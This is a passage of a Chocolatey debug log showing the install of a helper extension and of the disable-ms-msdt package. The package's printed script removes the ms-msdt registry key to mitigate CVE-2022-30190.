Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2016.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2016.ps1\".\n2026-06-09 18:36:04,462 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2019.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2019.ps1\".\n2026-06-09 18:36:04,479 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2022.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2022.ps1\".\n2026-06-09 18:36:04,479 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerDatacenter.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerDatacenter.ps1\".\n2026-06-09 18:36:04,511 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerEssentials.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerEssentials.ps1\".\n2026-06-09 18:36:04,526 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerFoundation.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerFoundation.ps1\".\n2026-06-09 18:36:04,526 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerSBS.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerSBS.ps1\".\n2026-06-09 18:36:04,526 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStandard.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerStandard.ps1\".\n2026-06-09 18:36:04,541 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStorage.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerStorage.ps1\".\n2026-06-09 18:36:04,541 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerWeb.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerWeb.ps1\".\n2026-06-09 18:36:04,634 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinWorkstation.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinWorkstation.ps1\".\n2026-06-09 18:36:04,634 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsXen.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsXen.ps1\".\n2026-06-09 18:36:04,650 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-NuspecInfo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-NuspecInfo.ps1\".\n2026-06-09 18:36:04,650 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-PendingReboot.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-PendingReboot.ps1\".\n2026-06-09 18:36:04,666 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinName.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinName.ps1\".\n2026-06-09 18:36:04,666 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerBuild.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinVerBuild.ps1\".\n2026-06-09 18:36:04,681 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMajor.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinVerMajor.ps1\".\n2026-06-09 18:36:04,696 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMinor.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinVerMinor.ps1\".\n2026-06-09 18:36:06,228 4968 [WARN ] -  Installed/updated chocolatey-fastanswers extensions.\n2026-06-09 18:36:06,337 4968 [DEBUG] - Attempting to create directory \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\".\n2026-06-09 18:36:06,399 4968 [DEBUG] - There was no original file at 'C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.files'\n2026-06-09 18:36:06,399 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.extra\".\n2026-06-09 18:36:06,415 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.version\".\n2026-06-09 18:36:06,415 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.sxs\".\n2026-06-09 18:36:06,432 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.pin\".\n2026-06-09 18:36:06,463 4968 [DEBUG] - Sending message 'HandlePackageResultCompletedMessage' out if there are subscribers...\n2026-06-09 18:36:06,463 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\.chocolateyPending\".\n2026-06-09 18:36:06,478 4968 [INFO ] -  The install of chocolatey-fastanswers.extension was successful.\n2026-06-09 18:36:06,478 4968 [INFO ] -   Deployed to 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers'\n2026-06-09 18:36:06,493 4968 [DEBUG] - Attempting to delete file \"\".\n2026-06-09 18:36:06,511 4968 [INFO ] - Downloading package from source 'https://community.chocolatey.org/api/v2/'\n2026-06-09 18:36:06,511 4968 [DEBUG] - Package download location 'https://community.chocolatey.org/api/v2/package/disable-ms-msdt/1.0.0'\n2026-06-09 18:36:06,524 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/package/disable-ms-msdt/1.0.0\n2026-06-09 18:36:06,775 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/package/disable-ms-msdt/1.0.0 249ms\n2026-06-09 18:36:06,775 4968 [INFO ] - [NuGet] Acquiring lock for the installation of disable-ms-msdt 1.0.0\n2026-06-09 18:36:06,791 4968 [INFO ] - [NuGet] Acquired lock for the installation of disable-ms-msdt 1.0.0\n2026-06-09 18:36:06,853 4968 [INFO ] - [NuGet] Installed disable-ms-msdt 1.0.0 from https://community.chocolatey.org/api/v2/ with content hash mLUKSJ1YoCnHmDrpUCp3KduSLRFG+au1K58/rjyiK/7SinA0ys+s/5dy2iivwm1oYVvrMwGKbW81NZypQV6hhQ==.\n2026-06-09 18:36:06,868 4968 [DEBUG] - Skipping package hash validation as feature 'usePackageHashValidation' is not enabled.\n2026-06-09 18:36:06,915 4968 [INFO ] - [NuGet] Adding package 'disable-ms-msdt.1.0.0 : chocolatey-fastanswers.extension (, )' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:06,947 4968 [INFO ] - [NuGet] Added package 'disable-ms-msdt.1.0.0 : chocolatey-fastanswers.extension (, )' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:06,961 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\disable-ms-msdt/1.0.0\\disable-ms-msdt.1.0.0.nupkg\".\n2026-06-09 18:36:06,961 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\disable-ms-msdt/1.0.0\\.nupkg.metadata\".\n2026-06-09 18:36:06,979 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\disable-ms-msdt/1.0.0\\disable-ms-msdt.1.0.0.nupkg.sha512\".\n2026-06-09 18:36:06,979 4968 [INFO ] - \ndisable-ms-msdt v1.0.0 (forced) [Approved]\n2026-06-09 18:36:06,994 4968 [INFO ] - disable-ms-msdt package files install completed. Performing other installation steps.\n2026-06-09 18:36:07,055 4968 [DEBUG] - Setting installer args for disable-ms-msdt\n2026-06-09 18:36:07,055 4968 [DEBUG] - Setting package parameters for disable-ms-msdt\n2026-06-09 18:36:07,072 4968 [DEBUG] - Contents of 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1':\n2026-06-09 18:36:07,113 4968 [DEBUG] - if (Get-IsWinWorkstation) {\n\tif ((Test-Path REGISTRY::HKEY_CLASSES_ROOT\\ms-msdt) -eq $true){\n\t\tWrite-Host \"Non-compliant with (CVE-2022-30190) Remove-Item ms-msdt now...\" -ForegroundColor \"Magenta\"\n\t\tRemove-Item REGISTRY::HKEY_CLASSES_ROOT\\ms-msdt -Recurse -Force\n\t\tWrite-Host \"Compliant with (CVE-2022-30190)\" -ForegroundColor \"Green\"\n\t} else {\n\t\tWrite-Host \"Now Compliant with (CVE-2022-30190)\" -ForegroundColor \"Green\"\n\t}\n} else {\n\tWrite-Host \"Not required on Windows Server\" -ForegroundColor \"Magenta\"\n}\n\n2026-06-09 18:36:07,167 4968 [DEBUG] - Calling built-in PowerShell host with ['[System.Threading.Thread]::CurrentThread.CurrentCulture = '';[System.Threading.Thread]::CurrentThread.CurrentUICulture = '';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::SystemDefault; & import-module -name 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyInstaller.psm1'; & 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyScriptRunner.ps1' -packageScript 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1' -installArguments '' -packageParameters '' -preRunHookScripts $null -postRunHookScripts $null']\n2026-06-09 18:36:07,196 4968 [DEBUG] - Redirecting System.Management.Automation.resources, Version=3.0.0.0, Culture=en-US, PublicKeyToken=31bf3856ad364e35, requested by ''\n2026-06-09 18:36:08,477 4968 [DEBUG] - Host version is 5.1.17763.1, PowerShell Version is '5.1.17763.6893' and CLR Version is '4.0.30319.42000'.\n2026-06-09 18:36:10,291 4968 [INFO ] - VERBOSE: Loading module from path 'C:\\ProgramData\\chocolatey\\helpers\\Chocolatey.PowerShell.dll'.\n2026-06-09 18:36:10,337 4968 [DEBUG] - Returning loaded assembly type for 'Chocolatey.PowerShell'\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:10,369 4968 [INFO ] - VERBOSE: Importing cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:10,369 4968 [INFO ] - VERBOSE: Importing cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:10,369 4968 [INFO ] - VERBOSE: Importing cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:10,477 4968 [DEBUG] - Cmdlets exported from Chocolatey.PowerShell.dll\n2026-06-09 18:36:10,524 4968 [DEBUG] - Get-EnvironmentVariable\n2026-06-09 18:36:10,524 4968 [DEBUG] - Get-EnvironmentVariableNames\n2026-06-09 18:36:10,540 4968 [DEBUG] - Install-ChocolateyPath\n2026-06-09 18:36:10,540 4968 [DEBUG] - Set-EnvironmentVariable\n2026-06-09 18:36:10,540 4968 [DEBUG] - Test-ProcessAdminRights\n2026-06-09 18:36:10,540 4968 [DEBUG] - Uninstall-ChocolateyPath\n2026-06-09 18:36:10,557 4968 [DEBUG] - Update-SessionEnvironment\n2026-06-09 18:36:10,588 4968 [INFO ] - VERBOSE: Exporting function 'Format-FileSize'.\n2026-06-09 18:36:10,604 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChecksumValid'.\n2026-06-09 18:36:10,604 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyConfigValue'.\n2026-06-09 18:36:10,618 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyPath'.\n2026-06-09 18:36:10,618 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyUnzip'.\n2026-06-09 18:36:10,618 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyWebFile'.\n2026-06-09 18:36:10,634 4968 [INFO ] - VERBOSE: Exporting function 'Get-FtpFile'.\n2026-06-09 18:36:10,634 4968 [INFO ] - VERBOSE: Exporting function 'Get-OSArchitectureWidth'.\n2026-06-09 18:36:10,649 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParameters'.\n2026-06-09 18:36:10,649 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParametersBuiltIn'.\n2026-06-09 18:36:10,649 4968 [INFO ] - VERBOSE: Exporting function 'Get-ToolsLocation'.\n2026-06-09 18:36:10,664 4968 [INFO ] - VERBOSE: Exporting function 'Get-UACEnabled'.\n2026-06-09 18:36:10,664 4968 [INFO ] - VERBOSE: Exporting function 'Get-UninstallRegistryKey'.\n2026-06-09 18:36:10,664 4968 [INFO ] - VERBOSE: Exporting function 'Get-VirusCheckValid'.\n2026-06-09 18:36:10,681 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFile'.\n2026-06-09 18:36:10,681 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFileName'.\n2026-06-09 18:36:10,681 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebHeaders'.\n2026-06-09 18:36:10,697 4968 [INFO ] - VERBOSE: Exporting function 'Install-BinFile'.\n2026-06-09 18:36:10,697 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:10,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyExplorerMenuItem'.\n2026-06-09 18:36:10,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyFileAssociation'.\n2026-06-09 18:36:10,727 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyInstallPackage'.\n2026-06-09 18:36:10,727 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPackage'.\n2026-06-09 18:36:10,727 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPinnedTaskBarItem'.\n2026-06-09 18:36:10,744 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPowershellCommand'.\n2026-06-09 18:36:10,744 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyShortcut'.\n2026-06-09 18:36:10,758 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyVsixPackage'.\n2026-06-09 18:36:10,758 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyZipPackage'.\n2026-06-09 18:36:10,774 4968 [INFO ] - VERBOSE: Exporting function 'Install-Vsix'.\n2026-06-09 18:36:10,774 4968 [INFO ] - VERBOSE: Exporting function 'Set-PowerShellExitCode'.\n2026-06-09 18:36:10,774 4968 [INFO ] - VERBOSE: Exporting function 'Start-ChocolateyProcessAsAdmin'.\n2026-06-09 18:36:10,790 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-BinFile'.\n2026-06-09 18:36:10,807 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:10,807 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyPackage'.\n2026-06-09 18:36:10,824 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyZipPackage'.\n2026-06-09 18:36:10,824 4968 [INFO ] - VERBOSE: Exporting function 'Write-FunctionCallLogMessage'.\n2026-06-09 18:36:10,836 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:10,836 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:10,852 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:10,852 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:10,852 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:10,868 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:10,868 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:10,884 4968 [INFO ] - VERBOSE: Exporting alias 'Get-ProcessorBits'.\n2026-06-09 18:36:10,884 4968 [INFO ] - VERBOSE: Exporting alias 'Get-OSBitness'.\n2026-06-09 18:36:10,884 4968 [INFO ] - VERBOSE: Exporting alias 'Get-InstallRegistryKey'.\n2026-06-09 18:36:10,899 4968 [INFO ] - VERBOSE: Exporting alias 'Generate-BinFile'.\n2026-06-09 18:36:10,899 4968 [INFO ] - VERBOSE: Exporting alias 'Add-BinFile'.\n2026-06-09 18:36:10,914 4968 [INFO ] - VERBOSE: Exporting alias 'Start-ChocolateyProcess'.\n2026-06-09 18:36:10,914 4968 [INFO ] - VERBOSE: Exporting alias 'Invoke-ChocolateyProcess'.\n2026-06-09 18:36:10,930 4968 [INFO ] - VERBOSE: Exporting alias 'Remove-BinFile'.\n2026-06-09 18:36:10,930 4968 [INFO ] - VERBOSE: Exporting alias 'refreshenv'.\n2026-06-09 18:36:10,947 4968 [DEBUG] - Loading community extensions\n2026-06-09 18:36:10,993 4968 [DEBUG] - Importing 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\chocolateyinstall-helpers.psm1'\n2026-06-09 18:36:11,008 4968 [INFO ] - VERBOSE: Loading module from path 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\chocolateyinstall-helpers.psm1'.\n2026-06-09 18:36:11,495 4968 [INFO ] - VERBOSE: Exporting function 'Get-Is32'.\n2026-06-09 18:36:11,509 4968 [INFO ] - VERBOSE: Exporting function 'Get-Is64'.\n2026-06-09 18:36:11,509 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDCPU'.\n2026-06-09 18:36:11,526 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDVideo'.\n2026-06-09 18:36:11,526 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsARMCPU'.\n2026-06-09 18:36:11,541 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsHyperV'.\n2026-06-09 18:36:11,556 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsInDomain'.\n2026-06-09 18:36:11,572 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelCPU'.\n2026-06-09 18:36:11,572 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelVideo'.\n2026-06-09 18:36:11,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsKVM'.\n2026-06-09 18:36:11,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsMobile'.\n2026-06-09 18:36:11,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:11,603 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsSSD'.\n2026-06-09 18:36:11,633 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVirtualBox'.\n2026-06-09 18:36:11,633 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVM'.\n2026-06-09 18:36:11,650 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVMware'.\n2026-06-09 18:36:11,650 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin10'.\n2026-06-09 18:36:11,666 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin11'.\n2026-06-09 18:36:11,666 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin7'.\n2026-06-09 18:36:11,680 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin8'.\n2026-06-09 18:36:11,680 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin80'.\n2026-06-09 18:36:11,696 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin81'.\n2026-06-09 18:36:11,696 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEdu'.\n2026-06-09 18:36:11,713 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEnt'.\n2026-06-09 18:36:11,713 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinHome'.\n2026-06-09 18:36:11,729 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinPro'.\n2026-06-09 18:36:11,729 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer'.\n2026-06-09 18:36:11,729 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008'.\n2026-06-09 18:36:11,743 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:11,743 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012'.\n2026-06-09 18:36:11,759 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:11,759 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2016'.\n2026-06-09 18:36:11,774 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2019'.\n2026-06-09 18:36:11,774 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2022'.\n2026-06-09 18:36:11,774 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:11,791 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:11,791 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:11,806 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:11,806 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:11,823 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:11,823 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:11,837 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:11,837 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsXen'.\n2026-06-09 18:36:11,853 4968 [INFO ] - VERBOSE: Exporting function 'Get-NuspecInfo'.\n2026-06-09 18:36:11,853 4968 [INFO ] - VERBOSE: Exporting function 'Get-PendingReboot'.\n2026-06-09 18:36:11,853 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinName'.\n2026-06-09 18:36:11,869 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerBuild'.\n2026-06-09 18:36:11,869 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMajor'.\n2026-06-09 18:36:11,883 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMinor'.\n2026-06-09 18:36:11,883 4968 [INFO ] - VERBOSE: Importing function 'Get-Is32'.\n2026-06-09 18:36:11,883 4968 [INFO ] - VERBOSE: Importing function 'Get-Is64'.\n2026-06-09 18:36:11,899 4968 [INFO ] - VERBOSE: Importing function 'Get-IsAMDCPU'.\n2026-06-09 18:36:11,899 4968 [INFO ] - VERBOSE: Importing function 'Get-IsAMDVideo'.\n2026-06-09 18:36:11,916 4968 [INFO ] - VERBOSE: Importing function 'Get-IsARMCPU'.\n2026-06-09 18:36:11,916 4968 [INFO ] - VERBOSE: Importing function 'Get-IsHyperV'.\n2026-06-09 18:36:11,916 4968 [INFO ] - VERBOSE: Importing function 'Get-IsInDomain'.\n2026-06-09 18:36:11,931 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelCPU'.\n2026-06-09 18:36:11,931 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelVideo'.\n2026-06-09 18:36:11,947 4968 [INFO ] - VERBOSE: Importing function 'Get-IsKVM'.\n2026-06-09 18:36:11,947 4968 [INFO ] - VERBOSE: Importing function 'Get-IsMobile'.\n2026-06-09 18:36:11,947 4968 [INFO ] - VERBOSE: Importing function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:11,961 4968 [INFO ] - VERBOSE: Importing function 'Get-IsSSD'.\n2026-06-09 18:36:11,961 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVirtualBox'.\n2026-06-09 18:36:11,961 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVM'.\n2026-06-09 18:36:11,978 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVMware'.\n2026-06-09 18:36:11,978 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin10'.\n2026-06-09 18:36:11,993 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin11'.\n2026-06-09 18:36:11,993 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin7'.\n2026-06-09 18:36:11,993 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin8'.\n2026-06-09 18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin80'.\n2026-06-09 18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin81'.\n2026-06-09 18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEdu'.\n2026-06-09 18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEnt'.\n2026-06-09 18:36:12,025 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinHome'.\n2026-06-09 18:36:12,025 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinPro'.\n2026-06-09 18:36:12,039 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer'.\n2026-06-09 18:36:12,039 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008'.\n2026-06-09 18:36:12,055 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:12,055 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012'.\n2026-06-09 18:36:12,055 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:12,072 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2016'.\n2026-06-09 18:36:12,072 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2019'.\n2026-06-09 18:36:12,072 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2022'.\n2026-06-09 18:36:12,087 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:12,087 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:12,087 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:12,102 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:12,102 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:12,120 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:12,120 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:12,135 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:12,135 4968 [INFO ] - VERBOSE: Importing function 'Get-IsXen'.\n2026-06-09 18:36:12,135 4968 [INFO ] - VERBOSE: Importing function 'Get-NuspecInfo'.\n2026-06-09 18:36:12,150 4968 [INFO ] - VERBOSE: Importing function 'Get-PendingReboot'.\n2026-06-09 18:36:12,150 4968 [INFO ] - VERBOSE: Importing function 'Get-WinName'.\n2026-06-09 18:36:12,165 4968 [INFO ] - VERBOSE: Importing function 